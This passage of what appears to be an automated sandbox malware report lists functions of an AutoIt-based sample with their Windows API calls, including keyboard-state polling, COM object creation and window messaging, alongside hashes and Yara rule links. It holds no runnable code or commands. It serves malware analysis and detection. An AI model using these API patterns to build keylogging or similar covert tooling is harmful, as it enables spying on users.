                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                            • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                                                                                                                                                                                                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                                                                                                                                            Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                                                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                                                                                                                                            Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3413494760-0
                                                                                                                                                                                                                                                            • Opcode ID: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                                                                                                                                                                                                                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                                                                                                                                            Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                                                                                                                                            • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                            • API String ID: 2634073740-771828931
                                                                                                                                                                                                                                                            • Opcode ID: 6e7dcbecb066f91f1afd9c9def4bbb5ae19de354f19f532b6bb27fcd75a4a3a5
                                                                                                                                                                                                                                                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e7dcbecb066f91f1afd9c9def4bbb5ae19de354f19f532b6bb27fcd75a4a3a5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                                                                                                                                            Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                                                                                                                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                            • API String ID: 2294789929-1287834457
                                                                                                                                                                                                                                                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                                                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                                                                                                                            Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                                                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                            • API String ID: 2483343779-2107944366
                                                                                                                                                                                                                                                            • Opcode ID: 038dcd04e55ec5c438f21b4de5b1dce7b91b6dae1b9492eacb09f34ba24fe95b
                                                                                                                                                                                                                                                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 038dcd04e55ec5c438f21b4de5b1dce7b91b6dae1b9492eacb09f34ba24fe95b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                                                                                                                                            Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00450720
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00450733
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                                                            • String ID: -----$SysListView32
                                                                                                                                                                                                                                                            • API String ID: 4008455318-3975388722
                                                                                                                                                                                                                                                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                                                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                                                                                                                                            Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00469C98
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00469CBC
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                            • API String ID: 2360848162-1403004172
                                                                                                                                                                                                                                                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                                                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                                                                                                                                            Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 262282135-0
                                                                                                                                                                                                                                                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                                                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                                                                                                                                            Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
